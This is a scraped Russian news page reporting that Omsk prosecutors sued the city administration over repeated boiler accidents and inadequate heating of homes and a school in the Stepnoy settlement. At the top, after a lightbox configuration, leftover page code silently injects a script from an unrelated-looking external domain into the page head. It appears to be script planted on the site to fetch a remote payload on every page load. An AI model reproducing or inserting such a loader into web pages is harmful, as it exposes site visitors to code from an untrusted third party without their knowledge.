, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 23 июля, 2018 года
31 января, 2013 События

За аварию в Степном ответит мэрия Омска

Мэрия Омска будет отвечать за аварию в Степном.

Прокуратура Центрального округа подала исковое заявление о принятии мер по восстановлению необходимого теплоснабжения объектов, которые находятся в муниципальной собственности в поселке Степной. Стоит напомнить, что ситуация в поселке с 2012 года беспокоит жителей района. Из-за неисправных котлов, которые обслуживает ООО «РЭУ Новосибирский», теплоснабжение постоянно будет находиться под угрозой.

Во время проверки соблюдения жилищного законодательства, удалось установить, что администрацией города производят ненадлежащее теплоснабжение 25 жилых домов и одной школы, которые находятся в поселке Степной на улицах Смоленская и Новаторов.

По сообщениям пресс-службы прокуратуры области, установили, что в ночь с 25 на 26 декабря прошлого года, из-за резкого падения давления работа котельной была остановлена четыре раза. Во время обследования средней школы обнаружили, что в классах температура +13 градусов, а в коридорах – 8 градусов. Также низкие температурные режимы зафиксировали в квартирах по улице Смоленская.

Помимо этого 19 января 2013 года в данной котельной взорвался котел и разорвалась мазутная трубка.

В прокуратуре сообщают, что в котельной в Степном во время отопительного сезона постоянно происходят аварии, из-за которых нарушаются жилищные права граждан на получение постоянных и качественных коммунальных услуг. Согласно результатам проверки, прокуратура направила в суд иск с требованием обязать администрацию города обеспечить качественное теплоснабжение объектов которые находятся в муниципальной собственности.

На данный момент исковое заявление принято к производству.

Перейти к комментариям [ 0 ]

Свежие статьи из категории: События